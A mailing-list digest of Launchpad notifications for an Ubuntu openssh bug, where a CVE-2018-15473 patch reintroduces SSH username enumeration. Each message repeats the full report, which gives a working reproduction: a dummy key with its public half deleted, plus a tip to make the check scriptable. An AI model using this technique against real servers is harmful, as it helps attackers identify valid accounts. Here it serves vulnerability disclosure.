[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Thanks, Kazza. That certainly helped. I also had a word with Marc and we
reached to the conclusion that Stretch isn't affected with this
backporting problem.
Thanks, again! \o/
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Hello Utkarsh,
I've just quickly run through the steps in the original bug report
against a recent Debian Stretch docker image and as not able to
reproduce it.
Image tested:
$ docker images | grep stretch
debianstretch d74a4ce6ed8b 11 days ago 101MB
If you are concerned, I suggest looking into the history/VCS logs of:
* debian/patches/CVE-2018-15473.patch
Then you can know if it traces back to Debian.
Hope it help.
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Hi Kazza, Marc,
I was wondering if you can repro the same bug in Debian Stretch? Do you
have the capacity to test that as well, please? :)
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Here's the debconf bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=223683
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
This isn't specific to the openssh update. Debian packages use tools
such as debconf that need to write to /tmp to function correctly.
** Bug watch added: Debian Bug tracker #223683
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=223683
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
Hi. I believe my Ubuntu systems just received this patch and I believe it
failed to install:
Can't exec "/tmp/openssh-server.config.neW0Pf": Permission denied at
/usr/share/perl/5.26/IPC/Open3.pm line 178.
open2: exec of /tmp/openssh-server.config.neW0Pf configure 1:7.6p1-4ubuntu0.3
failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59.
-
I think this is due to the fact I have noexec on /tmp.
Is it possible to bundle the changes in the package instead of putting a random
temporary file in /tmp and attempt to execute it?
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1934501] Re: CVE-2018-15473 patch introduce user enumeration vulnerability
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduce user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using a 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending if the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling a 18.04 docker image and installing openssh server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest:
sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version
Architecture Description
+++--=-=-=
ii openssh-client 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) client, for secure access to remote
machines
ii openssh-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) server, for secure access from remote
machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3amd64
secure shell (SSH) sftp server module, for SFTP access from
remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then to perform user enumeration, connecting with a public key results in
user enumeration:
* in the following id_rsa-dummy.pub is removed as it slightly changes message
flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move onto the
next auth method. This can be improved by adding "ssh -o
PasswordAuthentication=no" when connecting to avoid password prompt
and get an easy to script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1934501/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
